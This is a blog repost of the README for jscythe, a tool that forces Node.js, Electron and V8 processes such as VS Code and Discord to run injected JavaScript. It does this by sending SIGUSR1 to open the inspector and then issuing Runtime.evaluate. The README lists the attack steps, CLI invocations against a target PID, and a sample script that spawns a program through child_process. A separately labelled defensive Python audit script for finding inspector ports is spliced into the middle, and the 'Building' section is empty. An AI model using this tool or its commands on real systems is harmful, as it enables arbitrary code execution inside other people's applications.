Wednesday, November 2, 2022

Abuse the Node.js Inspector Mechanism in Order to Force Any Node.js/Electron/V8 Based Process to Execute Arbitrary JavaScript Code




jscythe abuses the node.js inspector mechanism in order to force any node.js/electron/v8 based process to execute arbitrary javascript code, even if their debugging capabilities are disabled.

Tested and working against Visual Studio Code, Discord, any Node.js application and more!

How

  1. Locate the target process.
  2. Send the SIGUSR1 signal to the process; this will enable the debugger on a port (depending on the software, sometimes it is random, sometimes it isn't).
  3. Determine the debugging port by diffing open ports before and after sending SIGUSR1.
  4. Get the websocket debugging URL and session id from http://localhost:<port>/json.
  5. Send a Runtime.evaluate request with the provided code.
  6. Profit.

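The steps above mean that any Node.js process whose inspector has been switched on (by a signal or otherwise) becomes an arbitrary-code-execution endpoint on loopback. The following is an added defender-side example, not part of jscythe or the original post: it audits a host for inspector listeners by checking candidate loopback ports for the inspector's /json/version and /json endpoints, which are the real endpoints the Node.js inspector exposes; the port range, the `audit` function and the sample responses are assumptions constructed for this example. Because the post notes that the port is sometimes random, the default range only covers the well-known inspector port and its neighbours; feed `audit` the host's actual listening ports (from your socket inventory) for a complete check.

```python
"""Audit loopback for enabled Node.js inspector endpoints (added example, not jscythe code)."""
import json
import socket
import urllib.request
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample of a /json/version reply; the field names are the ones the
# Node.js inspector really emits, the version string is made up.
SAMPLE_VERSION = b'{"Browser": "node.js/v18.17.1", "Protocol-Version": "1.1"}'

# Constructed sample of a /json target-list reply (id and paths are placeholders).
SAMPLE_TARGETS = b'''[{"description": "node.js instance",
  "id": "00000000-1111-2222-3333-444444444444",
  "title": "extensionHost",
  "type": "node",
  "url": "file:///placeholder/main.js",
  "webSocketDebuggerUrl": "ws://127.0.0.1:9229/00000000-1111-2222-3333-444444444444"}]'''


@dataclass
class InspectorHit:
    port: int
    version: str
    targets: List[str] = field(default_factory=list)  # titles of debuggable targets


def parse_version(payload: bytes) -> Optional[str]:
    """Return the Node.js version if the payload looks like an inspector /json/version reply."""
    try:
        data = json.loads(payload)
    except ValueError:
        return None
    browser = data.get("Browser", "") if isinstance(data, dict) else ""
    if isinstance(browser, str) and browser.lower().startswith("node.js/"):
        return browser.split("/", 1)[1]
    return None


def parse_targets(payload: bytes) -> List[str]:
    """Return titles of /json entries that are Node targets exposing a debugger websocket."""
    try:
        data = json.loads(payload)
    except ValueError:
        return []
    if not isinstance(data, list):
        return []
    return [t.get("title", "?") for t in data
            if isinstance(t, dict) and t.get("type") == "node" and "webSocketDebuggerUrl" in t]


def fetch(port: int, path: str, timeout: float = 0.5) -> Optional[bytes]:
    """GET http://127.0.0.1:<port><path>; None on any connection or HTTP error."""
    try:
        with urllib.request.urlopen(f"http://127.0.0.1:{port}{path}", timeout=timeout) as resp:
            return resp.read()
    except Exception:
        return None


def listening_ports(candidates) -> List[int]:
    """Cheap pre-filter: keep only candidate ports that accept a TCP connection on loopback."""
    open_ports = []
    for port in candidates:
        with socket.socket() as sock:
            sock.settimeout(0.2)
            if sock.connect_ex(("127.0.0.1", port)) == 0:
                open_ports.append(port)
    return open_ports


def audit(candidates=range(9229, 9240)) -> List[InspectorHit]:
    """Report every candidate port that answers like a Node.js inspector."""
    hits = []
    for port in listening_ports(candidates):
        version = parse_version(fetch(port, "/json/version") or b"")
        if version is None:
            continue  # something else is listening there
        hits.append(InspectorHit(port, version, parse_targets(fetch(port, "/json") or b"")))
    return hits


if __name__ == "__main__":
    found = audit()
    for hit in found:
        print(f"[!] inspector on 127.0.0.1:{hit.port} (node {hit.version}) targets={hit.targets}")
    if not found:
        print("no Node.js inspector endpoints found on the checked ports")
```

A hit means a local user (or any code already running on the host) can attach a debugger to that process, so the finding is worth tying back to the owning process and asking why the inspector is on; the audit only reads the two discovery endpoints and never opens the websocket.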
Building

Running

Target a specific process and execute a basic expression:

./target/debug/jscythe --pid 666 --code "5 - 3 + 2"

Execute code from a file:

./target/debug/jscythe --pid 666 --script example_script.js

The example_script.js can require any node module and execute any code, like:

require('child_process').spawnSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator', { encoding : 'utf8' }).stdout

Search process by expression:

./target/debug/jscythe --search extensionHost --script example_script.js

Other options

Run jscythe --help for the complete list of options.

License

This project is made with ♥ by @evilsocket and it's released under the GPL3 license.
